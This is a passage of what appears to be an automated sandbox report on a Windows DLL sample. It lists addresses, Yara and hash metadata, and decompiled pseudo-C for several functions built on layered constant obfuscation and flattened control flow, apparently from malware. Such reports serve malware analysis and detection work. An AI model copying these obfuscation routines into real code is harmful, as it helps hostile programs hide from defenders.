                                                                                                          0x02af9858
                                                                                                          0x02af985d
                                                                                                          0x02af9865
                                                                                                          0x02af986d
                                                                                                          0x02af9875
                                                                                                          0x02af987d
                                                                                                          0x02af9885
                                                                                                          0x02af9895
                                                                                                          0x02af9899
                                                                                                          0x02af98a1
                                                                                                          0x02af98a9
                                                                                                          0x02af98b1
                                                                                                          0x02af98be
                                                                                                          0x02af98bf
                                                                                                          0x02af98c3
                                                                                                          0x02af98c8
                                                                                                          0x02af98cd
                                                                                                          0x02af98d5
                                                                                                          0x02af98dd
                                                                                                          0x02af98e8
                                                                                                          0x02af98ec
                                                                                                          0x02af98f4
                                                                                                          0x02af98fc
                                                                                                          0x02af9901
                                                                                                          0x02af9909
                                                                                                          0x02af9916
                                                                                                          0x02af991e
                                                                                                          0x02af9926
                                                                                                          0x02af992a
                                                                                                          0x02af992a
                                                                                                          0x02af9938
                                                                                                          0x02af99d4
                                                                                                          0x02af99d9
                                                                                                          0x02af99dc
                                                                                                          0x02af99e3
                                                                                                          0x00000000
                                                                                                          0x02af993a
                                                                                                          0x02af9940
                                                                                                          0x02af999b
                                                                                                          0x02af99a0
                                                                                                          0x02af99a5
                                                                                                          0x02af99a7
                                                                                                          0x00000000
                                                                                                          0x02af99a7
                                                                                                          0x02af9942
                                                                                                          0x02af9948
                                                                                                          0x02af9987
                                                                                                          0x02af998c
                                                                                                          0x02af9991
                                                                                                          0x02af9993
                                                                                                          0x00000000
                                                                                                          0x02af9993
                                                                                                          0x02af994a
                                                                                                          0x02af9950
                                                                                                          0x00000000
                                                                                                          0x02af9956
                                                                                                          0x02af9962
                                                                                                          0x02af9967
                                                                                                          0x02af9950
                                                                                                          0x02af9948
                                                                                                          0x02af9940
                                                                                                          0x02af9969
                                                                                                          0x02af9971
                                                                                                          0x02af9971
                                                                                                          0x02af99eb
                                                                                                          0x02af99f0
                                                                                                          0x02af99f0
                                                                                                          0x00000000

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 1C4$F7$E
                                                                                                          • API String ID: 0-3303878784
                                                                                                          • Opcode ID: ec422184f0bc8e42d70ac5f52bb51cad38797440f210b574c256831cfc5cf489
                                                                                                          • Instruction ID: 6735b4ba614f607612b7ae05fb1b7c4d4f09675fa0b2d14e6a7962367c913a5c
                                                                                                          • Opcode Fuzzy Hash: ec422184f0bc8e42d70ac5f52bb51cad38797440f210b574c256831cfc5cf489
                                                                                                          • Instruction Fuzzy Hash: CB5165B2109381AFC398CF65D98991FBAE1FBC4748F405A1DF69656260D774CA09CF82
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AEB820, Relevance: 3.9, Strings: 3, Instructions: 145COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 100%
                                                                                                          			E02AEB820(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				void* _t158;
				void* _t162;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				intOrPtr _t192;
				intOrPtr* _t193;
				intOrPtr _t194;
				signed int* _t196;

				_t196 =  &_v68;
				_v16 = 0xd87d65;
				_v12 = 0x358b32;
				_v8 = 0xe06945;
				_t192 =  *0x2b06210; // 0x0
				_v4 = 0;
				_t162 = __ecx;
				_v68 = 0xf23e36;
				_t193 = _t192 + 0x210;
				_v68 = _v68 ^ 0x9abe7b4c;
				_t164 = 0x28;
				_v68 = _v68 / _t164;
				_v68 = _v68 + 0xffff9758;
				_v68 = _v68 ^ 0x03db1914;
				_v28 = 0x153966;
				_v28 = _v28 + 0xc98d;
				_v28 = _v28 ^ 0x00189a49;
				_v32 = 0x66a403;
				_v32 = _v32 + 0x4aa1;
				_v32 = _v32 ^ 0x006148cf;
				_v44 = 0xfe7e73;
				_v44 = _v44 + 0xffff9639;
				_v44 = _v44 | 0x437ec796;
				_v44 = _v44 ^ 0x43f7a292;
				_v48 = 0x44000d;
				_t165 = 0x26;
				_v48 = _v48 / _t165;
				_v48 = _v48 | 0x123d3176;
				_v48 = _v48 ^ 0x1230a07a;
				_v60 = 0x1c671b;
				_v60 = _v60 | 0x089dc1d7;
				_t166 = 0x64;
				_v60 = _v60 / _t166;
				_t167 = 0x5e;
				_v60 = _v60 * 0x62;
				_v60 = _v60 ^ 0x087e3283;
				_v24 = 0x917945;
				_v24 = _v24 ^ 0x5fcd23bd;
				_v24 = _v24 ^ 0x5f54fdfa;
				_v64 = 0xfb1c79;
				_v64 = _v64 ^ 0x3af08dd4;
				_v64 = _v64 + 0x24a6;
				_v64 = _v64 + 0xffffe057;
				_v64 = _v64 ^ 0x3a029534;
				_v36 = 0xae1548;
				_v36 = _v36 * 0x1a;
				_v36 = _v36 + 0x68c6;
				_v36 = _v36 ^ 0x11a48673;
				_v40 = 0xac750c;
				_v40 = _v40 ^ 0x67c11f84;
				_v40 = _v40 | 0x960dc624;
				_v40 = _v40 ^ 0xf7630ea5;
				_v52 = 0x5bbbfa;
				_v52 = _v52 / _t167;
				_v52 = _v52 + 0xc5b0;
				_v52 = _v52 ^ 0x922587b4;
				_v52 = _v52 ^ 0x922f6435;
				_v56 = 0xb91e06;
				_t168 = 0x13;
				_v56 = _v56 / _t168;
				_v56 = _v56 + 0x7f58;
				_v56 = _v56 << 2;
				_v56 = _v56 ^ 0x002d76eb;
				_v20 = 0xce5e52;
				_t169 = 0x56;
				_v20 = _v20 / _t169;
				_v20 = _v20 ^ 0x000b3737;
				while(1) {
					_t194 =  *_t193;
					if(_t194 == 0) {
						break;
					}
					if( *((intOrPtr*)(_t194 + 0x38)) == 0) {
						L4:
						 *_t193 =  *((intOrPtr*)(_t194 + 0x24));
						_t158 = E02B02B09(_v52, _t194, _v56, _v20);
					} else {
						_t158 = E02B01028(_v28, _v32,  *((intOrPtr*)(_t194 + 0x48)), _t162, _v44, _v48);
						_t196 =  &(_t196[4]);
						if(_t158 != _v68) {
							_t193 = _t194 + 0x24;
						} else {
							 *((intOrPtr*)(_t194 + 0x2c))( *((intOrPtr*)(_t194 + 0x38)), 0, 0);
							E02AEF0E9(_v72,  *((intOrPtr*)(_t194 + 0x38)), _v36, _v76);
							E02B01538(_v48, _v52,  *((intOrPtr*)(_t194 + 0x48)));
							_t196 =  &(_t196[3]);
							goto L4;
						}
					}
				}
				return _t158;
			}


































                                                                                                          0x02aeb820
                                                                                                          0x02aeb823
                                                                                                          0x02aeb82d
                                                                                                          0x02aeb835
                                                                                                          0x02aeb841
                                                                                                          0x02aeb849
                                                                                                          0x02aeb84d
                                                                                                          0x02aeb84f
                                                                                                          0x02aeb857
                                                                                                          0x02aeb85d
                                                                                                          0x02aeb86b
                                                                                                          0x02aeb870
                                                                                                          0x02aeb876
                                                                                                          0x02aeb87e
                                                                                                          0x02aeb886
                                                                                                          0x02aeb88e
                                                                                                          0x02aeb896
                                                                                                          0x02aeb89e
                                                                                                          0x02aeb8a6
                                                                                                          0x02aeb8ae
                                                                                                          0x02aeb8b6
                                                                                                          0x02aeb8be
                                                                                                          0x02aeb8c6
                                                                                                          0x02aeb8ce
                                                                                                          0x02aeb8d6
                                                                                                          0x02aeb8e2
                                                                                                          0x02aeb8e7
                                                                                                          0x02aeb8ed
                                                                                                          0x02aeb8f5
                                                                                                          0x02aeb8fd
                                                                                                          0x02aeb905
                                                                                                          0x02aeb911
                                                                                                          0x02aeb916
                                                                                                          0x02aeb921
                                                                                                          0x02aeb922
                                                                                                          0x02aeb926
                                                                                                          0x02aeb92e
                                                                                                          0x02aeb936
                                                                                                          0x02aeb93e
                                                                                                          0x02aeb946
                                                                                                          0x02aeb94e
                                                                                                          0x02aeb956
                                                                                                          0x02aeb95e
                                                                                                          0x02aeb966
                                                                                                          0x02aeb96e
                                                                                                          0x02aeb97b
                                                                                                          0x02aeb97f
                                                                                                          0x02aeb987
                                                                                                          0x02aeb98f
                                                                                                          0x02aeb997
                                                                                                          0x02aeb99f
                                                                                                          0x02aeb9a7
                                                                                                          0x02aeb9af
                                                                                                          0x02aeb9bd
                                                                                                          0x02aeb9c1
                                                                                                          0x02aeb9c9
                                                                                                          0x02aeb9d1
                                                                                                          0x02aeb9d9
                                                                                                          0x02aeb9e9
                                                                                                          0x02aeb9ee
                                                                                                          0x02aeb9f4
                                                                                                          0x02aeb9fc
                                                                                                          0x02aeba01
                                                                                                          0x02aeba09
                                                                                                          0x02aeba15
                                                                                                          0x02aeba18
                                                                                                          0x02aeba1c
                                                                                                          0x02aeba96
                                                                                                          0x02aeba96
                                                                                                          0x02aeba9a
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02aeba29
                                                                                                          0x02aeba7c
                                                                                                          0x02aeba8d
                                                                                                          0x02aeba8f
                                                                                                          0x02aeba2b
                                                                                                          0x02aeba3f
                                                                                                          0x02aeba44
                                                                                                          0x02aeba4b
                                                                                                          0x02aebaa4
                                                                                                          0x02aeba4d
                                                                                                          0x02aeba52
                                                                                                          0x02aeba64
                                                                                                          0x02aeba74
                                                                                                          0x02aeba79
                                                                                                          0x00000000
                                                                                                          0x02aeba79
                                                                                                          0x02aeba4b
                                                                                                          0x02aeba29
                                                                                                          0x02aebaa3

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $P$Ei$v-
                                                                                                          • API String ID: 0-1888193988
                                                                                                          • Opcode ID: 7c370d5096bfdece01614535834f0a9ff54d58ddf3f7f66ac524891afa06ef19
                                                                                                          • Instruction ID: fda4cc81d089fc6ff874d194de542918b46f04317989b15692422cc4ad04f625
                                                                                                          • Opcode Fuzzy Hash: 7c370d5096bfdece01614535834f0a9ff54d58ddf3f7f66ac524891afa06ef19
                                                                                                          • Instruction Fuzzy Hash: 046135B15083809FD398CF25D58980BBBF2FBC8718F408A1DF19A56260D7B5DA1ACF56
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02B007AA, Relevance: 3.9, Strings: 3, Instructions: 145COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 91%
                                                                                                          			E02B007AA(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr* _a12) {
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t127;
				void* _t143;
				void* _t147;
				intOrPtr _t159;
				void* _t165;
				signed int _t166;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				signed int* _t172;

				_t145 = _a12;
				_t164 = _a4;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E02AFFE29(_t127);
				_v68 = 0xce0704;
				_t172 =  &(( &_v80)[5]);
				_t165 = 0;
				_t147 = 0xeb10c15;
				_push("true");
				_pop(_t166);
				_v68 = _v68 / _t166;
				_v68 = _v68 ^ 0x27d6a24c;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0x13812000;
				_v56 = 0x3987d6;
				_v56 = _v56 + 0xffffa396;
				_v56 = _v56 << 6;
				_v56 = _v56 + 0xffffda2f;
				_v56 = _v56 ^ 0x0e4ab52f;
				_v76 = 0xda5b69;
				_v76 = _v76 + 0xffffc444;
				_v76 = _v76 >> 3;
				_v76 = _v76 | 0xf293bfd0;
				_v76 = _v76 ^ 0xf29c223d;
				_v80 = 0x3698bd;
				_v80 = _v80 << 2;
				_v80 = _v80 + 0xffffb830;
				_v80 = _v80 | 0x7cee6fd8;
				_v80 = _v80 ^ 0x7cfe3832;
				_v44 = 0x3a6f25;
				_v44 = _v44 >> 3;
				_v44 = _v44 ^ 0x000731a8;
				_v48 = 0xdbe73e;
				_v48 = _v48 | 0x7450ea9d;
				_v48 = _v48 ^ 0x74de2fdf;
				_v36 = 0x16da79;
				_t167 = 0x12;
				_v36 = _v36 * 0x5d;
				_v36 = _v36 ^ 0x084db146;
				_v60 = 0xec6235;
				_v60 = _v60 + 0x184b;
				_v60 = _v60 / _t167;
				_v60 = _v60 | 0x0c30d5fb;
				_v60 = _v60 ^ 0x0c38efee;
				_v64 = 0x38c801;
				_v64 = _v64 >> 9;
				_v64 = _v64 ^ 0xc825be84;
				_v64 = _v64 >> 0x10;
				_v64 = _v64 ^ 0x000d1c3b;
				_v72 = 0xe77e6e;
				_v72 = _v72 + 0xffffb3b2;
				_v72 = _v72 << 0xd;
				_t168 = 0x78;
				_v72 = _v72 / _t168;
				_v72 = _v72 ^ 0x01e31a81;
				_v40 = 0x7e766a;
				_v40 = _v40 * 0x26;
				_v40 = _v40 ^ 0x12c7afcd;
				_v52 = 0xe103b8;
				_t169 = 0x4e;
				_v52 = _v52 / _t169;
				_v52 = _v52 + 0xffff4b52;
				_v52 = _v52 ^ 0x000d8548;
				do {
					while(_t147 != 0x8d72c38) {
						if(_t147 == 0xc75b0cb) {
							_t143 = E02AE57B8( *_t164, _v76, _v80,  *((intOrPtr*)(_t164 + 4)), _v44,  &_v32, _v48);
							_t172 =  &(_t172[6]);
							if(_t143 != 0) {
								_t147 = 0x8d72c38;
								continue;
							}
						} else {
							if(_t147 != 0xeb10c15) {
								goto L8;
							} else {
								_t147 = 0xc75b0cb;
								continue;
							}
						}
						goto L9;
					}
					_t159 =  *0x2b06224; // 0x0
					E02B04D53( *((intOrPtr*)(_t145 + 4)),  *((intOrPtr*)(_t159 + 0x48)), _v36, _t147,  &_v32, _v60, _v64, _v68, _v72, _v40, _t147,  *_t145, _v52);
					_t172 =  &(_t172[0xb]);
					_t147 = 0x3b36d39;
					_t165 =  ==  ? 1 : _t165;
					L8:
				} while (_t147 != 0x3b36d39);
				L9:
				return _t165;
			}


























                                                                                                          0x02b007ae
                                                                                                          0x02b007b5
                                                                                                          0x02b007b9
                                                                                                          0x02b007ba
                                                                                                          0x02b007be
                                                                                                          0x02b007bf
                                                                                                          0x02b007c1
                                                                                                          0x02b007c6
                                                                                                          0x02b007ce
                                                                                                          0x02b007d7
                                                                                                          0x02b007d9
                                                                                                          0x02b007de
                                                                                                          0x02b007e0
                                                                                                          0x02b007e5
                                                                                                          0x02b007eb
                                                                                                          0x02b007f3
                                                                                                          0x02b007f8
                                                                                                          0x02b00800
                                                                                                          0x02b00808
                                                                                                          0x02b00810
                                                                                                          0x02b00815
                                                                                                          0x02b0081d
                                                                                                          0x02b00825
                                                                                                          0x02b0082d
                                                                                                          0x02b00835
                                                                                                          0x02b0083a
                                                                                                          0x02b00842
                                                                                                          0x02b0084a
                                                                                                          0x02b00852
                                                                                                          0x02b00857
                                                                                                          0x02b0085f
                                                                                                          0x02b00867
                                                                                                          0x02b0086f
                                                                                                          0x02b00877
                                                                                                          0x02b0087c
                                                                                                          0x02b00884
                                                                                                          0x02b0088c
                                                                                                          0x02b00894
                                                                                                          0x02b0089c
                                                                                                          0x02b008a9
                                                                                                          0x02b008ac
                                                                                                          0x02b008b0
                                                                                                          0x02b008b8
                                                                                                          0x02b008c0
                                                                                                          0x02b008d0
                                                                                                          0x02b008d4
                                                                                                          0x02b008dc
                                                                                                          0x02b008e4
                                                                                                          0x02b008ec
                                                                                                          0x02b008f1
                                                                                                          0x02b008f9
                                                                                                          0x02b008fe
                                                                                                          0x02b00906
                                                                                                          0x02b0090e
                                                                                                          0x02b00916
                                                                                                          0x02b0091f
                                                                                                          0x02b00922
                                                                                                          0x02b00926
                                                                                                          0x02b0092e
                                                                                                          0x02b0093b
                                                                                                          0x02b0093f
                                                                                                          0x02b00947
                                                                                                          0x02b00957
                                                                                                          0x02b0095f
                                                                                                          0x02b00963
                                                                                                          0x02b0096b
                                                                                                          0x02b00973
                                                                                                          0x02b00973
                                                                                                          0x02b0097d
                                                                                                          0x02b009a8
                                                                                                          0x02b009ad
                                                                                                          0x02b009b2
                                                                                                          0x02b009b4
                                                                                                          0x00000000
                                                                                                          0x02b009b4
                                                                                                          0x02b0097f
                                                                                                          0x02b00985
                                                                                                          0x00000000
                                                                                                          0x02b00987
                                                                                                          0x02b00987
                                                                                                          0x00000000
                                                                                                          0x02b00987
                                                                                                          0x02b00985
                                                                                                          0x00000000
                                                                                                          0x02b0097d
                                                                                                          0x02b009dd
                                                                                                          0x02b009e9
                                                                                                          0x02b009f7
                                                                                                          0x02b009fc
                                                                                                          0x02b00a01
                                                                                                          0x02b00a04
                                                                                                          0x02b00a04
                                                                                                          0x02b00a11
                                                                                                          0x02b00a19

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 5b$jv~$n~
                                                                                                          • API String ID: 0-1119068381
                                                                                                          • Opcode ID: 4c66cc8c5b1fc047da2f9f0c1d8d8e7c8b8521757ebaed212209ad9eb0917a1b
                                                                                                          • Instruction ID: 4be22fa5967f25e9ca97dca6c83cdbef61de3b2d43923ee1dd2ae0e3e15df664
                                                                                                          • Opcode Fuzzy Hash: 4c66cc8c5b1fc047da2f9f0c1d8d8e7c8b8521757ebaed212209ad9eb0917a1b
                                                                                                          • Instruction Fuzzy Hash: 3C5155724083059FC748DF25C98991FBBE1FBD8758F508A1DF296A6260D371CA89CF46
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AF7A0F, Relevance: 3.9, Strings: 3, Instructions: 137COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 87%
                                                                                                          			E02AF7A0F(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				intOrPtr _v76;
				char _v596;
				void* _t147;
				signed int _t170;
				signed int _t171;
				signed int _t172;
				signed int _t173;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02AFFE29(_t147);
				_v72 = _v72 & 0x00000000;
				_v68 = _v68 & 0x00000000;
				_v76 = 0xac6bc1;
				_v48 = 0x918367;
				_v48 = _v48 >> 6;
				_v48 = _v48 ^ 0x000cf094;
				_v36 = 0xe92c2d;
				_v36 = _v36 ^ 0xfac2eab7;
				_v36 = _v36 << 0xf;
				_v36 = _v36 ^ 0xe346c7b1;
				_v64 = 0xc08572;
				_t170 = 0x1e;
				_v64 = _v64 / _t170;
				_v64 = _v64 ^ 0x00015c03;
				_v12 = 0x9212d2;
				_t171 = 0x1d;
				_v12 = _v12 * 0x39;
				_v12 = _v12 + 0x3383;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x08263998;
				_v32 = 0xc20336;
				_v32 = _v32 * 0x70;
				_v32 = _v32 ^ 0x74671eb1;
				_v32 = _v32 ^ 0x2084f54c;
				_v40 = 0xa9787c;
				_v40 = _v40 ^ 0x381c5a49;
				_v40 = _v40 | 0x64fc5a0b;
				_v40 = _v40 ^ 0x7cf9cebd;
				_v20 = 0x646c84;
				_v20 = _v20 * 0xa;
				_v20 = _v20 ^ 0x10bf9a9f;
				_v20 = _v20 ^ 0x793d42f9;
				_v20 = _v20 ^ 0x6a6515eb;
				_v60 = 0xc09cf0;
				_v60 = _v60 << 9;
				_v60 = _v60 ^ 0x813cbcc6;
				_v8 = 0xc99b6c;
				_v8 = _v8 * 0x26;
				_v8 = _v8 + 0xffff7686;
				_v8 = _v8 ^ 0x08dcc16a;
				_v8 = _v8 ^ 0x1531615b;
				_v44 = 0x17c218;
				_v44 = _v44 | 0xd7791395;
				_v44 = _v44 + 0xde66;
				_v44 = _v44 ^ 0xd7809290;
				_v28 = 0x8f3b5f;
				_v28 = _v28 >> 0xb;
				_v28 = _v28 * 0x5e;
				_v28 = _v28 ^ 0x00039abd;
				_v56 = 0xe3e33c;
				_v56 = _v56 * 0x69;
				_v56 = _v56 ^ 0x5d7c15ff;
				_v52 = 0x7e8124;
				_v52 = _v52 + 0xc0d9;
				_v52 = _v52 ^ 0x007e7944;
				_v24 = 0x2edb0b;
				_v24 = _v24 / _t171;
				_t172 = 0x3a;
				_v24 = _v24 / _t172;
				_t173 = 0x6f;
				_v24 = _v24 / _t173;
				_v24 = _v24 ^ 0x00044e1b;
				_v16 = 0xd6e45b;
				_v16 = _v16 * 0x6a;
				_v16 = _v16 | 0xc518fde9;
				_v16 = _v16 + 0xffff1d23;
				_v16 = _v16 ^ 0xddf5a256;
				_push(_v12);
				_push(_v64);
				_push(_v36);
				E02AF2C9C(_v40, _v16, E02AFE1F8(0x2ae170c, _v48, _v16),  &_v596, 0x2ae170c, _v20, __edx);
				E02AFFECB(_t164, _v60, _v8, _v44, _v28);
				return E02AED061( &_v596, _v56, _v52, _v24, _v16);
			}



























                                                                                                          0x02af7a1a
                                                                                                          0x02af7a1f
                                                                                                          0x02af7a22
                                                                                                          0x02af7a25
                                                                                                          0x02af7a26
                                                                                                          0x02af7a27
                                                                                                          0x02af7a2c
                                                                                                          0x02af7a32
                                                                                                          0x02af7a36
                                                                                                          0x02af7a3d
                                                                                                          0x02af7a44
                                                                                                          0x02af7a48
                                                                                                          0x02af7a4f
                                                                                                          0x02af7a56
                                                                                                          0x02af7a5d
                                                                                                          0x02af7a61
                                                                                                          0x02af7a68
                                                                                                          0x02af7a74
                                                                                                          0x02af7a79
                                                                                                          0x02af7a7e
                                                                                                          0x02af7a85
                                                                                                          0x02af7a90
                                                                                                          0x02af7a91
                                                                                                          0x02af7a94
                                                                                                          0x02af7a9b
                                                                                                          0x02af7a9f
                                                                                                          0x02af7aa6
                                                                                                          0x02af7ab1
                                                                                                          0x02af7ab4
                                                                                                          0x02af7abb
                                                                                                          0x02af7ac2
                                                                                                          0x02af7ac9
                                                                                                          0x02af7ad0
                                                                                                          0x02af7ad7
                                                                                                          0x02af7ade
                                                                                                          0x02af7ae9
                                                                                                          0x02af7aec
                                                                                                          0x02af7af3
                                                                                                          0x02af7afa
                                                                                                          0x02af7b01
                                                                                                          0x02af7b08
                                                                                                          0x02af7b0c
                                                                                                          0x02af7b13
                                                                                                          0x02af7b1e
                                                                                                          0x02af7b21
                                                                                                          0x02af7b28
                                                                                                          0x02af7b2f
                                                                                                          0x02af7b36
                                                                                                          0x02af7b3d
                                                                                                          0x02af7b44
                                                                                                          0x02af7b4b
                                                                                                          0x02af7b52
                                                                                                          0x02af7b59
                                                                                                          0x02af7b61
                                                                                                          0x02af7b64
                                                                                                          0x02af7b6b
                                                                                                          0x02af7b76
                                                                                                          0x02af7b79
                                                                                                          0x02af7b80
                                                                                                          0x02af7b87
                                                                                                          0x02af7b8e
                                                                                                          0x02af7b95
                                                                                                          0x02af7ba1
                                                                                                          0x02af7ba9
                                                                                                          0x02af7bb0
                                                                                                          0x02af7bb8
                                                                                                          0x02af7bc0
                                                                                                          0x02af7bc3
                                                                                                          0x02af7bca
                                                                                                          0x02af7bd5
                                                                                                          0x02af7bd8
                                                                                                          0x02af7bdf
                                                                                                          0x02af7be6
                                                                                                          0x02af7bed
                                                                                                          0x02af7bf0
                                                                                                          0x02af7bf3
                                                                                                          0x02af7c16
                                                                                                          0x02af7c29
                                                                                                          0x02af7c4d

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: -,$<$Dy~
                                                                                                          • API String ID: 0-1106285139
                                                                                                          • Opcode ID: 11a025c1c54e86db0b4c7504fb89b985a240b157a8d456ac13a7acd33d05cbe4
                                                                                                          • Instruction ID: 9c7d4e894392e26d3cc061483187ddd16e2598b0da8b12677ceb97e01f733187
                                                                                                          • Opcode Fuzzy Hash: 11a025c1c54e86db0b4c7504fb89b985a240b157a8d456ac13a7acd33d05cbe4
                                                                                                          • Instruction Fuzzy Hash: 1E61DD71C01219EBDF08CFE5EA8A9EEBBB2FB48314F208159E111B6260D7B54A55CF94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AE7442, Relevance: 3.9, Strings: 3, Instructions: 116COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 85%
                                                                                                          			E02AE7442(intOrPtr* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				void* _t68;
				intOrPtr _t81;
				signed int _t82;
				signed int _t87;
				signed int _t88;
				void* _t91;
				intOrPtr _t105;
				intOrPtr* _t106;
				void* _t107;
				signed int* _t111;

				_push(_a16);
				_t106 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E02AFFE29(_t68);
				_v24 = 0x62b98c;
				_t111 =  &(( &_v28)[6]);
				_t107 = 0;
				_t91 = 0x56d49db;
				_t87 = 0x32;
				_v24 = _v24 * 0x4b;
				_v24 = _v24 / _t87;
				_v24 = _v24 + 0xffff2f8c;
				_v24 = _v24 ^ 0x009a9eb5;
				_v16 = 0xcd53e2;
				_t88 = 0x3a;
				_v16 = _v16 * 0x65;
				_v16 = _v16 + 0xffffa8ae;
				_v16 = _v16 ^ 0x510428a2;
				_v28 = 0xd5f3ee;
				_v28 = _v28 ^ 0x77e73800;
				_v28 = _v28 / _t88;
				_v28 = _v28 >> 7;
				_v28 = _v28 ^ 0x0000e246;
				_v20 = 0x9cb423;
				_v20 = _v20 + 0x5dad;
				_v20 = _v20 ^ 0xe88d7dca;
				_v20 = _v20 ^ 0xe81c7203;
				_v4 = 0x5f6be5;
				_t46 =  &_v4; // 0x5f6be5
				_v4 =  *_t46 * 0x5c;
				_v4 = _v4 ^ 0x224497bb;
				_v8 = 0xac6149;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x0020023e;
				_v12 = 0x405ac1;
				_v12 = _v12 >> 0xd;
				_v12 = _v12 ^ 0x000eeb29;
				do {
					while(_t91 != 0x56d49db) {
						if(_t91 == 0x845f35b) {
							_t82 = E02AF0F86(_t106);
							asm("sbb ecx, ecx");
							_t91 = ( ~_t82 & 0xfe625aa0) + 0xd9296b1;
							continue;
						} else {
							if(_t91 == 0xbb8a3c5) {
								E02AF0D04();
								_t91 = 0xd9296b1;
								continue;
							} else {
								if(_t91 == 0xbf4f151) {
									if(E02AF8FAE(_a4) != 0) {
										_t107 = 1;
									} else {
										_t91 = 0xbb8a3c5;
										continue;
									}
								} else {
									if(_t91 != 0xd9296b1) {
										goto L12;
									} else {
										_t105 =  *0x2b06224; // 0x0
										E02B02B09(_v4, _t105, _v8, _v12);
									}
								}
							}
						}
						L15:
						return _t107;
					}
					_push(_t91);
					_push(_t91);
					_t81 = E02AEC5D8(0x64);
					_t111 =  &(_t111[3]);
					 *0x2b06224 = _t81;
					_t91 = 0x845f35b;
					L12:
				} while (_t91 != 0xd85fda5);
				goto L15;
			}




















                                                                                                          0x02ae7449
                                                                                                          0x02ae744d
                                                                                                          0x02ae744f
                                                                                                          0x02ae7453
                                                                                                          0x02ae7457
                                                                                                          0x02ae745c
                                                                                                          0x02ae745d
                                                                                                          0x02ae7462
                                                                                                          0x02ae746a
                                                                                                          0x02ae7474
                                                                                                          0x02ae7476
                                                                                                          0x02ae7482
